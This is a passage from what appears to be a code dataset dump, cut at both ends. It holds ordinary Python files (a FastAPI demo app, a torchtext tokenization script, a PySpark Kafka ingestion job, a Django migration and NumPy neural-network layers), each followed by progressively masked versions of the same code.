response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get(\"/items_id/{item_id}\")\nasync def read_items(\n item_id: int = Path(..., title=\"The ID of the item to get\"),\n q: Optional[str] = Query(None, alias=\"item-query\")\n):\n results = {\"item_id\": item_id}\n if q:\n results.update({\"q\": q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str = None): # query param string\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str = Header(...)): # Header\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail=\"X-Item-ID header invalid\")\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str = Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}') # dynamic route\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post(\"/payload_json\")\nasync def create_item(payload: dict = Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str = Form(...), username: str = Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context={'request': request})\n\n\n@app.get(\"/func_element\", response_model=Item, tags=[\"Description\"], deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post(\"/func_item\", response_model=Item, tags=[\"Description\"], summary=\"Create an item\",\n description=\"Create an item with all the , name, description, price, tax and a set of unique tags\")\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from torchtext import data
from torchtext import datasets
import re
import spacy
spacy_de = spacy.load('de')
spacy_en = spacy.load('en')
url = re.compile('(<url>.*</url>)')
def tokenize_de(text):
return [tok.text for tok in spacy_de.tokenizer(url.sub('@URL@', text))]
def tokenize_en(text):
return [tok.text for tok in spacy_en.tokenizer(url.sub('@URL@', text))]
DE = data.Field(tokenize=tokenize_de)
EN = data.Field(tokenize=tokenize_en)
train, val = datasets.TranslationDataset.splits(path='~/iwslt2016/de-en/',
train='train.tags.de-en', validation='IWSLT16.TED.tst2013.de-en', exts=
('.de', '.en'), fields=(DE, EN))
print(train.fields)
print(len(train))
print(vars(train[0]))
print(vars(train[100]))
DE.build_vocab(train.src, min_freq=3)
EN.build_vocab(train.trg, max_size=50000)
train_iter, val_iter = data.BucketIterator.splits((train, val), batch_size=
3, device=0)
print(DE.vocab.freqs.most_common(10))
print(DE.vocab.size)
print(EN.vocab.freqs.most_common(10))
print(EN.vocab.size)
batch = next(iter(train_iter))
print(batch.src)
print(batch.trg)
|
normal
|
{
"blob_id": "4e715ccb4f95e7fe7e495a1181ad5df530f5a53f",
"index": 5773,
"step-1": "<mask token>\n\n\ndef tokenize_de(text):\n return [tok.text for tok in spacy_de.tokenizer(url.sub('@URL@', text))]\n\n\ndef tokenize_en(text):\n return [tok.text for tok in spacy_en.tokenizer(url.sub('@URL@', text))]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef tokenize_de(text):\n return [tok.text for tok in spacy_de.tokenizer(url.sub('@URL@', text))]\n\n\ndef tokenize_en(text):\n return [tok.text for tok in spacy_en.tokenizer(url.sub('@URL@', text))]\n\n\n<mask token>\nprint(train.fields)\nprint(len(train))\nprint(vars(train[0]))\nprint(vars(train[100]))\nDE.build_vocab(train.src, min_freq=3)\nEN.build_vocab(train.trg, max_size=50000)\n<mask token>\nprint(DE.vocab.freqs.most_common(10))\nprint(DE.vocab.size)\nprint(EN.vocab.freqs.most_common(10))\nprint(EN.vocab.size)\n<mask token>\nprint(batch.src)\nprint(batch.trg)\n",
"step-3": "<mask token>\nspacy_de = spacy.load('de')\nspacy_en = spacy.load('en')\nurl = re.compile('(<url>.*</url>)')\n\n\ndef tokenize_de(text):\n return [tok.text for tok in spacy_de.tokenizer(url.sub('@URL@', text))]\n\n\ndef tokenize_en(text):\n return [tok.text for tok in spacy_en.tokenizer(url.sub('@URL@', text))]\n\n\nDE = data.Field(tokenize=tokenize_de)\nEN = data.Field(tokenize=tokenize_en)\ntrain, val = datasets.TranslationDataset.splits(path='~/iwslt2016/de-en/',\n train='train.tags.de-en', validation='IWSLT16.TED.tst2013.de-en', exts=\n ('.de', '.en'), fields=(DE, EN))\nprint(train.fields)\nprint(len(train))\nprint(vars(train[0]))\nprint(vars(train[100]))\nDE.build_vocab(train.src, min_freq=3)\nEN.build_vocab(train.trg, max_size=50000)\ntrain_iter, val_iter = data.BucketIterator.splits((train, val), batch_size=\n 3, device=0)\nprint(DE.vocab.freqs.most_common(10))\nprint(DE.vocab.size)\nprint(EN.vocab.freqs.most_common(10))\nprint(EN.vocab.size)\nbatch = next(iter(train_iter))\nprint(batch.src)\nprint(batch.trg)\n",
"step-4": "from torchtext import data\nfrom torchtext import datasets\nimport re\nimport spacy\nspacy_de = spacy.load('de')\nspacy_en = spacy.load('en')\nurl = re.compile('(<url>.*</url>)')\n\n\ndef tokenize_de(text):\n return [tok.text for tok in spacy_de.tokenizer(url.sub('@URL@', text))]\n\n\ndef tokenize_en(text):\n return [tok.text for tok in spacy_en.tokenizer(url.sub('@URL@', text))]\n\n\nDE = data.Field(tokenize=tokenize_de)\nEN = data.Field(tokenize=tokenize_en)\ntrain, val = datasets.TranslationDataset.splits(path='~/iwslt2016/de-en/',\n train='train.tags.de-en', validation='IWSLT16.TED.tst2013.de-en', exts=\n ('.de', '.en'), fields=(DE, EN))\nprint(train.fields)\nprint(len(train))\nprint(vars(train[0]))\nprint(vars(train[100]))\nDE.build_vocab(train.src, min_freq=3)\nEN.build_vocab(train.trg, max_size=50000)\ntrain_iter, val_iter = data.BucketIterator.splits((train, val), batch_size=\n 3, device=0)\nprint(DE.vocab.freqs.most_common(10))\nprint(DE.vocab.size)\nprint(EN.vocab.freqs.most_common(10))\nprint(EN.vocab.size)\nbatch = next(iter(train_iter))\nprint(batch.src)\nprint(batch.trg)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
from pyspark.sql.types import StructType, StructField, StringType, TimestampType, IntegerType
from main.config.spark_config import SparkConfiguration
import main.config.constants as Constants
from main.connectors.kafka_connector import KafkaConnector, extract_json_data
def main():
# Configure Spark Session
config = {
"spark.jars.packages": "io.delta:delta-core_2.12:0.8.0,"
"org.postgresql:postgresql:9.4.1211,"
"org.apache.spark:spark-streaming-kafka-0-10_2.12:3.0.0,"
"org.apache.spark:spark-sql-kafka-0-10_2.12:3.0.0",
"spark.sql.extensions": "io.delta.sql.DeltaSparkSessionExtension",
"spark.driver.memory": "8g",
"spark.sql.catalog.spark_catalog": "org.apache.spark.sql.delta.catalog.DeltaCatalog",
Constants.DELTA_SRC_PATH: Constants.DELTA_LOCATION,
Constants.POSTGRESQL_DB: Constants.POSTGRESQL_DB_VALUE,
Constants.POSTGRESQL_USER: Constants.POSTGRESQL_USER_VALUE,
Constants.POSTGRESQL_PASSWORD: Constants.POSTGRESQL_PASSWORD_VALUE,
Constants.POSTGRESQL_HOST: Constants.POSTGRESQL_HOST_VALUE,
Constants.KAFKA_SERVER: Constants.KAFKA_SERVER_NAME,
}
spark_configuration = SparkConfiguration(app_name="visits_ads_event_ingestion", spark_master="local[4]",
log_level="WARN", configuration=config)
import main.orchestrator as Orchestrator
########################
# Visit events ingestion
########################
visits_schema = StructType([
StructField('id_user', IntegerType(), False),
StructField('id_video', IntegerType(), False),
StructField('id_device', IntegerType(), False),
StructField('id_location', IntegerType(), False),
StructField('visit_date', TimestampType(), True)
])
visits_stream = KafkaConnector(spark_configuration).get_stream('visits', start_from_begining=False).load()
visits_stream = extract_json_data(visits_stream, visits_schema)
# For each micro-batch of visit events
visits_stream.writeStream \
.option("checkpointLocation", "checkpoint/visits") \
.foreachBatch(lambda visits_batch, index: Orchestrator.ingest_visits(visits_batch, spark_configuration, index))\
.start()
# Await stream termination
spark_configuration.spark_session.streams.awaitAnyTermination()
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "23099b29fb5898c2556d1612690e33860662ca35",
"index": 9846,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n config = {'spark.jars.packages':\n 'io.delta:delta-core_2.12:0.8.0,org.postgresql:postgresql:9.4.1211,org.apache.spark:spark-streaming-kafka-0-10_2.12:3.0.0,org.apache.spark:spark-sql-kafka-0-10_2.12:3.0.0'\n , 'spark.sql.extensions': 'io.delta.sql.DeltaSparkSessionExtension',\n 'spark.driver.memory': '8g', 'spark.sql.catalog.spark_catalog':\n 'org.apache.spark.sql.delta.catalog.DeltaCatalog', Constants.\n DELTA_SRC_PATH: Constants.DELTA_LOCATION, Constants.POSTGRESQL_DB:\n Constants.POSTGRESQL_DB_VALUE, Constants.POSTGRESQL_USER: Constants\n .POSTGRESQL_USER_VALUE, Constants.POSTGRESQL_PASSWORD: Constants.\n POSTGRESQL_PASSWORD_VALUE, Constants.POSTGRESQL_HOST: Constants.\n POSTGRESQL_HOST_VALUE, Constants.KAFKA_SERVER: Constants.\n KAFKA_SERVER_NAME}\n spark_configuration = SparkConfiguration(app_name=\n 'visits_ads_event_ingestion', spark_master='local[4]', log_level=\n 'WARN', configuration=config)\n import main.orchestrator as Orchestrator\n visits_schema = StructType([StructField('id_user', IntegerType(), False\n ), StructField('id_video', IntegerType(), False), StructField(\n 'id_device', IntegerType(), False), StructField('id_location',\n IntegerType(), False), StructField('visit_date', TimestampType(), \n True)])\n visits_stream = KafkaConnector(spark_configuration).get_stream('visits',\n start_from_begining=False).load()\n visits_stream = extract_json_data(visits_stream, visits_schema)\n visits_stream.writeStream.option('checkpointLocation', 'checkpoint/visits'\n ).foreachBatch(lambda visits_batch, index: Orchestrator.\n ingest_visits(visits_batch, spark_configuration, index)).start()\n spark_configuration.spark_session.streams.awaitAnyTermination()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n config = {'spark.jars.packages':\n 'io.delta:delta-core_2.12:0.8.0,org.postgresql:postgresql:9.4.1211,org.apache.spark:spark-streaming-kafka-0-10_2.12:3.0.0,org.apache.spark:spark-sql-kafka-0-10_2.12:3.0.0'\n , 'spark.sql.extensions': 'io.delta.sql.DeltaSparkSessionExtension',\n 'spark.driver.memory': '8g', 'spark.sql.catalog.spark_catalog':\n 'org.apache.spark.sql.delta.catalog.DeltaCatalog', Constants.\n DELTA_SRC_PATH: Constants.DELTA_LOCATION, Constants.POSTGRESQL_DB:\n Constants.POSTGRESQL_DB_VALUE, Constants.POSTGRESQL_USER: Constants\n .POSTGRESQL_USER_VALUE, Constants.POSTGRESQL_PASSWORD: Constants.\n POSTGRESQL_PASSWORD_VALUE, Constants.POSTGRESQL_HOST: Constants.\n POSTGRESQL_HOST_VALUE, Constants.KAFKA_SERVER: Constants.\n KAFKA_SERVER_NAME}\n spark_configuration = SparkConfiguration(app_name=\n 'visits_ads_event_ingestion', spark_master='local[4]', log_level=\n 'WARN', configuration=config)\n import main.orchestrator as Orchestrator\n visits_schema = StructType([StructField('id_user', IntegerType(), False\n ), StructField('id_video', IntegerType(), False), StructField(\n 'id_device', IntegerType(), False), StructField('id_location',\n IntegerType(), False), StructField('visit_date', TimestampType(), \n True)])\n visits_stream = KafkaConnector(spark_configuration).get_stream('visits',\n start_from_begining=False).load()\n visits_stream = extract_json_data(visits_stream, visits_schema)\n visits_stream.writeStream.option('checkpointLocation', 'checkpoint/visits'\n ).foreachBatch(lambda visits_batch, index: Orchestrator.\n ingest_visits(visits_batch, spark_configuration, index)).start()\n spark_configuration.spark_session.streams.awaitAnyTermination()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from pyspark.sql.types import StructType, StructField, StringType, TimestampType, IntegerType\nfrom main.config.spark_config import SparkConfiguration\nimport main.config.constants as Constants\nfrom main.connectors.kafka_connector import KafkaConnector, extract_json_data\n\n\ndef main():\n config = {'spark.jars.packages':\n 'io.delta:delta-core_2.12:0.8.0,org.postgresql:postgresql:9.4.1211,org.apache.spark:spark-streaming-kafka-0-10_2.12:3.0.0,org.apache.spark:spark-sql-kafka-0-10_2.12:3.0.0'\n , 'spark.sql.extensions': 'io.delta.sql.DeltaSparkSessionExtension',\n 'spark.driver.memory': '8g', 'spark.sql.catalog.spark_catalog':\n 'org.apache.spark.sql.delta.catalog.DeltaCatalog', Constants.\n DELTA_SRC_PATH: Constants.DELTA_LOCATION, Constants.POSTGRESQL_DB:\n Constants.POSTGRESQL_DB_VALUE, Constants.POSTGRESQL_USER: Constants\n .POSTGRESQL_USER_VALUE, Constants.POSTGRESQL_PASSWORD: Constants.\n POSTGRESQL_PASSWORD_VALUE, Constants.POSTGRESQL_HOST: Constants.\n POSTGRESQL_HOST_VALUE, Constants.KAFKA_SERVER: Constants.\n KAFKA_SERVER_NAME}\n spark_configuration = SparkConfiguration(app_name=\n 'visits_ads_event_ingestion', spark_master='local[4]', log_level=\n 'WARN', configuration=config)\n import main.orchestrator as Orchestrator\n visits_schema = StructType([StructField('id_user', IntegerType(), False\n ), StructField('id_video', IntegerType(), False), StructField(\n 'id_device', IntegerType(), False), StructField('id_location',\n IntegerType(), False), StructField('visit_date', TimestampType(), \n True)])\n visits_stream = KafkaConnector(spark_configuration).get_stream('visits',\n start_from_begining=False).load()\n visits_stream = extract_json_data(visits_stream, visits_schema)\n visits_stream.writeStream.option('checkpointLocation', 'checkpoint/visits'\n ).foreachBatch(lambda visits_batch, index: Orchestrator.\n ingest_visits(visits_batch, spark_configuration, index)).start()\n spark_configuration.spark_session.streams.awaitAnyTermination()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from pyspark.sql.types import StructType, StructField, StringType, TimestampType, IntegerType\nfrom main.config.spark_config import SparkConfiguration\nimport main.config.constants as Constants\nfrom main.connectors.kafka_connector import KafkaConnector, extract_json_data\n\n\ndef main():\n # Configure Spark Session\n config = {\n \"spark.jars.packages\": \"io.delta:delta-core_2.12:0.8.0,\"\n \"org.postgresql:postgresql:9.4.1211,\"\n \"org.apache.spark:spark-streaming-kafka-0-10_2.12:3.0.0,\"\n \"org.apache.spark:spark-sql-kafka-0-10_2.12:3.0.0\",\n \"spark.sql.extensions\": \"io.delta.sql.DeltaSparkSessionExtension\",\n \"spark.driver.memory\": \"8g\",\n \"spark.sql.catalog.spark_catalog\": \"org.apache.spark.sql.delta.catalog.DeltaCatalog\",\n Constants.DELTA_SRC_PATH: Constants.DELTA_LOCATION,\n Constants.POSTGRESQL_DB: Constants.POSTGRESQL_DB_VALUE,\n Constants.POSTGRESQL_USER: Constants.POSTGRESQL_USER_VALUE,\n Constants.POSTGRESQL_PASSWORD: Constants.POSTGRESQL_PASSWORD_VALUE,\n Constants.POSTGRESQL_HOST: Constants.POSTGRESQL_HOST_VALUE,\n Constants.KAFKA_SERVER: Constants.KAFKA_SERVER_NAME,\n }\n spark_configuration = SparkConfiguration(app_name=\"visits_ads_event_ingestion\", spark_master=\"local[4]\",\n log_level=\"WARN\", configuration=config)\n import main.orchestrator as Orchestrator\n\n ########################\n # Visit events ingestion\n ########################\n\n visits_schema = StructType([\n StructField('id_user', IntegerType(), False),\n StructField('id_video', IntegerType(), False),\n StructField('id_device', IntegerType(), False),\n StructField('id_location', IntegerType(), False),\n StructField('visit_date', TimestampType(), True)\n ])\n visits_stream = KafkaConnector(spark_configuration).get_stream('visits', start_from_begining=False).load()\n visits_stream = extract_json_data(visits_stream, visits_schema)\n\n # For each micro-batch of visit events\n visits_stream.writeStream \\\n .option(\"checkpointLocation\", \"checkpoint/visits\") \\\n .foreachBatch(lambda visits_batch, index: Orchestrator.ingest_visits(visits_batch, spark_configuration, index))\\\n .start()\n\n # Await stream termination\n spark_configuration.spark_session.streams.awaitAnyTermination()\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 2.1.1 on 2018-09-24 04:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('backend', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Aro',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=255, unique=True)),
],
),
migrations.AddField(
model_name='bicicleta',
name='modelo',
field=models.CharField(default=1, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='bicicleta',
name='numero_serie',
field=models.CharField(default=1, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='bicicleta',
name='aro',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='backend.Aro'),
preserve_default=False,
),
]
|
normal
|
{
"blob_id": "8dff22249abbae9e30ba1ad423457270e0cd9b20",
"index": 7027,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('backend', '0001_initial')]\n operations = [migrations.CreateModel(name='Aro', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('nombre', models.CharField(max_length=255,\n unique=True))]), migrations.AddField(model_name='bicicleta', name=\n 'modelo', field=models.CharField(default=1, max_length=255),\n preserve_default=False), migrations.AddField(model_name='bicicleta',\n name='numero_serie', field=models.CharField(default=1, max_length=\n 255), preserve_default=False), migrations.AddField(model_name=\n 'bicicleta', name='aro', field=models.ForeignKey(default=1,\n on_delete=django.db.models.deletion.CASCADE, to='backend.Aro'),\n preserve_default=False)]\n",
"step-4": "from django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('backend', '0001_initial')]\n operations = [migrations.CreateModel(name='Aro', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('nombre', models.CharField(max_length=255,\n unique=True))]), migrations.AddField(model_name='bicicleta', name=\n 'modelo', field=models.CharField(default=1, max_length=255),\n preserve_default=False), migrations.AddField(model_name='bicicleta',\n name='numero_serie', field=models.CharField(default=1, max_length=\n 255), preserve_default=False), migrations.AddField(model_name=\n 'bicicleta', name='aro', field=models.ForeignKey(default=1,\n on_delete=django.db.models.deletion.CASCADE, to='backend.Aro'),\n preserve_default=False)]\n",
"step-5": "# Generated by Django 2.1.1 on 2018-09-24 04:59\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('backend', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Aro',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('nombre', models.CharField(max_length=255, unique=True)),\n ],\n ),\n migrations.AddField(\n model_name='bicicleta',\n name='modelo',\n field=models.CharField(default=1, max_length=255),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='bicicleta',\n name='numero_serie',\n field=models.CharField(default=1, max_length=255),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='bicicleta',\n name='aro',\n field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='backend.Aro'),\n preserve_default=False,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import numpy as np
class Layer:
def __init__(self):
pass
@property
def need_update(self):
return False
class FC(Layer):
def __init__(self, W, b, lr, decay, epoch_drop, l2=0):
self.W = W.copy()
self.b = b.copy()
self.alpha_0 = lr
self.decay = decay
self.epoch_drop = epoch_drop
self.l2 = l2
self.count = 0
def forward(self, x):
self.x = x.copy()
self.m, self.n = x.shape
return np.dot(self.x, self.W) + self.b
def backprop(self, back_grad):
self.grad_W = np.dot(self.x.T, back_grad) + self.l2 * self.W
self.grad_b = np.dot(np.ones(self.m), back_grad)
self.grad = np.dot(back_grad, self.W.T)
return self.grad
def l_rate(self):
lrate = self.alpha_0 * \
(self.decay ** (np.floor((1 + self.count) / self.epoch_drop)))
self.count += 1
return lrate
def update(self):
lr = self.l_rate()
self.W -= lr * self.grad_W
self.b -= lr * self.grad_b
@property
def need_update(self):
return True
class Sigmoid(Layer):
def forward(self, x):
self.x = x.copy()
self.sig_res = 1 / (1 + np.exp(-x))
return self.sig_res
def backprop(self, back_grad):
grad = back_grad * self.sig_res * (1 - self.sig_res)
return grad
class Relu(Layer):
def forward(self, x):
self.x = x.copy()
return np.maximum(x, 0)
def backprop(self, back_grad):
grad = back_grad.copy()
grad[self.x < 0] = 0
return grad
class Leaky_Relu(Layer):
def forward(self, x):
self.x = x.copy()
return np.maximum(x, self.x * 0.01)
def backprop(self, back_grad):
grad = back_grad.copy()
grad[self.x < 0] = grad[self.x < 0] * 0.01
return grad
class Tanh(Layer):
def forward(self, x):
self.x = x.copy()
self.tanh = np.tanh(x)
return self.tanh
def backprop(self, back_grad):
grad = back_grad * (1 - self.tanh ** 2)
return grad
class Arctan(Layer):
def forward(self, x):
self.x = x.copy()
return np.arctan(self.x)
def backprop(self, back_grad):
grad = back_grad / (1 + self.x ** 2)
return grad
class SoftPlus(Layer):
def forward(self, x):
self.x = x.copy()
return np.log(1 + np.exp(self.x))
def backprop(self, back_grad):
grad = back_grad / (1 + np.exp(-self.x))
return grad
class SoftSign(Layer):
def forward(self, x):
self.x = x.copy()
return self.x / (1 + np.abs(self.x))
def backprop(self, back_grad):
grad = back_grad / (1 + np.abs(self.x) ** 2)
return grad
class Softmax(Layer):
def forward(self, x, y):
self.x = (x.copy() - x.max(axis=1).reshape(-1, 1))
# Avoiding overflow of exp(),
# This operation doesn't change the output of CE
self.y = y.copy()
self.m, self.n = self.x.shape
self.denom = np.sum(np.exp(x), axis=1).reshape((-1, 1))
self.softmax = np.exp(x) / self.denom
loss = 0
for i in range(self.m):
loss -= np.log(self.softmax[i, y[i]])
return loss / self.m
def dirac(self, a, b):
return 1 if a == b else 0
def backprop(self):
grad = np.zeros([self.m, self.n])
for i in range(self.m):
for j in range(self.n):
grad[i, j] = (self.softmax[i, j] -
self.dirac(j, self.y[i])) / self.m
return grad
def get_act_func(layer_name):
activation_function_dict = {
"arctan": Arctan,
"l_relu": Leaky_Relu,
"relu": Relu,
"sigmoid": Sigmoid,
"tanh": Tanh,
"softplus": SoftPlus,
"softsign": SoftSign
}
return activation_function_dict[layer_name]()
|
normal
|
{
"blob_id": "a5a764586faabb5af58f4649cdd20b6b18236a99",
"index": 6080,
"step-1": "<mask token>\n\n\nclass Leaky_Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, self.x * 0.01)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = grad[self.x < 0] * 0.01\n return grad\n\n\nclass Tanh(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n self.tanh = np.tanh(x)\n return self.tanh\n\n def backprop(self, back_grad):\n grad = back_grad * (1 - self.tanh ** 2)\n return grad\n\n\nclass Arctan(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.arctan(self.x)\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + self.x ** 2)\n return grad\n\n\nclass SoftPlus(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.log(1 + np.exp(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.exp(-self.x))\n return grad\n\n\nclass SoftSign(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return self.x / (1 + np.abs(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.abs(self.x) ** 2)\n return grad\n\n\nclass Softmax(Layer):\n\n def forward(self, x, y):\n self.x = x.copy() - x.max(axis=1).reshape(-1, 1)\n self.y = y.copy()\n self.m, self.n = self.x.shape\n self.denom = np.sum(np.exp(x), axis=1).reshape((-1, 1))\n self.softmax = np.exp(x) / self.denom\n loss = 0\n for i in range(self.m):\n loss -= np.log(self.softmax[i, y[i]])\n return loss / self.m\n\n def dirac(self, a, b):\n return 1 if a == b else 0\n\n def backprop(self):\n grad = np.zeros([self.m, self.n])\n for i in range(self.m):\n for j in range(self.n):\n grad[i, j] = (self.softmax[i, j] - self.dirac(j, self.y[i])\n ) / self.m\n return grad\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FC(Layer):\n <mask token>\n\n def forward(self, x):\n self.x = x.copy()\n self.m, self.n = x.shape\n return np.dot(self.x, self.W) + self.b\n\n def backprop(self, back_grad):\n self.grad_W = np.dot(self.x.T, back_grad) + self.l2 * self.W\n self.grad_b = np.dot(np.ones(self.m), back_grad)\n self.grad = np.dot(back_grad, self.W.T)\n return self.grad\n\n def l_rate(self):\n lrate = self.alpha_0 * self.decay ** np.floor((1 + self.count) /\n self.epoch_drop)\n self.count += 1\n return lrate\n <mask token>\n <mask token>\n\n\nclass Sigmoid(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n self.sig_res = 1 / (1 + np.exp(-x))\n return self.sig_res\n\n def backprop(self, back_grad):\n grad = back_grad * self.sig_res * (1 - self.sig_res)\n return grad\n\n\nclass Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, 0)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = 0\n return grad\n\n\nclass Leaky_Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, self.x * 0.01)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = grad[self.x < 0] * 0.01\n return grad\n\n\nclass Tanh(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n self.tanh = np.tanh(x)\n return self.tanh\n\n def backprop(self, back_grad):\n grad = back_grad * (1 - self.tanh ** 2)\n return grad\n\n\nclass Arctan(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.arctan(self.x)\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + self.x ** 2)\n return grad\n\n\nclass SoftPlus(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.log(1 + np.exp(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.exp(-self.x))\n return grad\n\n\nclass SoftSign(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return self.x / (1 + np.abs(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.abs(self.x) ** 2)\n return grad\n\n\nclass Softmax(Layer):\n\n def forward(self, x, y):\n self.x = x.copy() - x.max(axis=1).reshape(-1, 1)\n self.y = y.copy()\n self.m, self.n = self.x.shape\n self.denom = np.sum(np.exp(x), axis=1).reshape((-1, 1))\n self.softmax = np.exp(x) / self.denom\n loss = 0\n for i in range(self.m):\n loss -= np.log(self.softmax[i, y[i]])\n return loss / self.m\n\n def dirac(self, a, b):\n return 1 if a == b else 0\n\n def backprop(self):\n grad = np.zeros([self.m, self.n])\n for i in range(self.m):\n for j in range(self.n):\n grad[i, j] = (self.softmax[i, j] - self.dirac(j, self.y[i])\n ) / self.m\n return grad\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FC(Layer):\n\n def __init__(self, W, b, lr, decay, epoch_drop, l2=0):\n self.W = W.copy()\n self.b = b.copy()\n self.alpha_0 = lr\n self.decay = decay\n self.epoch_drop = epoch_drop\n self.l2 = l2\n self.count = 0\n\n def forward(self, x):\n self.x = x.copy()\n self.m, self.n = x.shape\n return np.dot(self.x, self.W) + self.b\n\n def backprop(self, back_grad):\n self.grad_W = np.dot(self.x.T, back_grad) + self.l2 * self.W\n self.grad_b = np.dot(np.ones(self.m), back_grad)\n self.grad = np.dot(back_grad, self.W.T)\n return self.grad\n\n def l_rate(self):\n lrate = self.alpha_0 * self.decay ** np.floor((1 + self.count) /\n self.epoch_drop)\n self.count += 1\n return lrate\n\n def update(self):\n lr = self.l_rate()\n self.W -= lr * self.grad_W\n self.b -= lr * self.grad_b\n\n @property\n def need_update(self):\n return True\n\n\nclass Sigmoid(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n self.sig_res = 1 / (1 + np.exp(-x))\n return self.sig_res\n\n def backprop(self, back_grad):\n grad = back_grad * self.sig_res * (1 - self.sig_res)\n return grad\n\n\nclass Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, 0)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = 0\n return grad\n\n\nclass Leaky_Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, self.x * 0.01)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = grad[self.x < 0] * 0.01\n return grad\n\n\nclass Tanh(Layer):\n\n def forward(self, x):\n 